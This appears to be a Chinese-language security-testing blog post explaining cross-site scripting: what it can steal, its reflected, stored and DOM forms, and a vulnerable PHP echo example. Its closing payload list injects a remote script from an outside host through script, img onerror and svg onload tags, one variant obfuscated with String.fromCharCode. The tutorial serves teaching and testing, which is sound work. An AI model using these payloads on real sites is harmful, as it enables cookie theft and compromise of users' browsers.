XSS漏洞分析

上一篇 / 下一篇  2018-11-06 14:19:35 / 个人分类:安全测试工具


  1.什么是XSS
  跨站脚本攻击(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入而已html代码,当浏览该页之时,嵌入其中web里面的html代码会被执行,从而达到而已攻击用户的特殊目的。
  2、XSS可以干什么
  盗取管理员Cookie或用户Cookie
  XSSWorm
  挂马(水坑攻击)
  有局限性的键盘记录
  3、XSS分类
  放射性XSS
  存储型XSS
  DOMXSS
  flashXSS
  mXSS
  4、反射(非持久)型XSS
  发出请求时,XSS代码出现在URL中,最后输入提交到服务器,服务器解析后响应在响应内容中出现这段XSS代码,最后浏览器解析执行
  这个过程就像一次反射,所以命名为反射性XSS
  xss.php
  <?php
  echo$_GET['x']
  ?>
  #提交
  /xss.php?x=<script>alert(1)</script>
  服务端解析式,echo就会完整的输出<script>alert(1)</script>到响应体中,然后浏览器解析执行触发弹窗
  储存(持久)型XSS
  储存型XSS和反射型XSS的差别仅在于:提交的XSS代码会储存在服务器(不管是数据库/内存/文件系统等),下次请求目标页面是不用在提交XSS代码。
  最典型的例子就是留言板XSS,用户提交一条包含XSS代码的留言储存到数据库中,目标用户查看留言板是,那些留言内容会从数据库查村出来并显示,浏览器发现有XSS代码,就当作正常的HTML和JS解析执行,于是触发了XSS攻击
  储存性XSS的攻击是最隐蔽的  
#eg:http://www.nfpeople.com/user.php?id=21839
  5、XSS是如何利用的
  payload(有效的攻击代码)
<script. src='http://b.ioio.pub/xss/probe.js'></script>
<img src=x nerror="s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js'";>
<svg nload=s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js>
<svg nload=eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,
101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,9
7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,
99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,
47,120,115,115,47,112,114,111,98,101,46,106,115)) >

TAG: xss XSS 安全测试 测试工具

 

评分:0

我来说两句

日历

« 2024-03-28  
     12
3456789
10111213141516
17181920212223
24252627282930
31      

我的存档

数据统计

  • 访问量: 37479
  • 日志数: 42
  • 建立时间: 2018-11-01
  • 更新时间: 2018-11-06

RSS订阅

Open Toolbar